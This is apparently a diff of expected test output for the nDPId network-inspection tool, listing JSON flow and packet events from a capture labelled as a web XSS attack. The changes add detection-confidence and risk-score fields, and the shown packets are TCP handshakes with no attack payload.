+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348041088,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348041088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1499348041088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l85AAD4GLgKsEAABwKgKMooOAFBaWpfjAAAAAKACchDg\/QAAAgQFtAQCCAoBPQAtAAAAAAEDAwc="}
@@ -3650,15 +3650,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348050079,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Gn1AAD4Gq1OsEAABwKgKMopsAFCVUBKIAAAAAKACchAiPQAAAgQFtAQCCAoBPQj1AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":2,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348050079,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQimww3+sulVASiaAScSAovgAAAgQFtAQCCAoD5tppAT0I9QEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":3,"flow_last_seen":1499348050080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348050080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gn5AAD4Gq1qsEAABwKgKMopsAFCVUBKJMN\/rL4AQAOXHxQAAAQEICgE9CPUD5tpp"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051107,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348051362,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348051362,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ntRAAD4GJvysEAABwKgKMop6AFCG4ZTiAAAAAKACchCtAgAAAgQFtAQCCAoBPQo2AAAAAAEDAwc="}
@@ -3688,16 +3688,16 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9050,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":1,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348060393,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ItAAD4G9USsEAABwKgKMoraAFD\/pcOMAAAAAKACchD8YgAAAgQFtAQCCAoBPRMHAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9051,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":2,"flow_last_seen":1499348060393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348060393,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQitr3giqS\/6XDjaAScSDyygAAAgQFtAQCCAoD5uR7AT0TBwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_packet_id":3,"flow_last_seen":1499348060394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348060394,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00IxAAD4G9UusEAABwKgKMoraAFD\/pcON94Iqk4AQAOWR0QAAAQEICgE9EwgD5uR7"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347935445,"flow_last_seen":1499347940883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348061427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
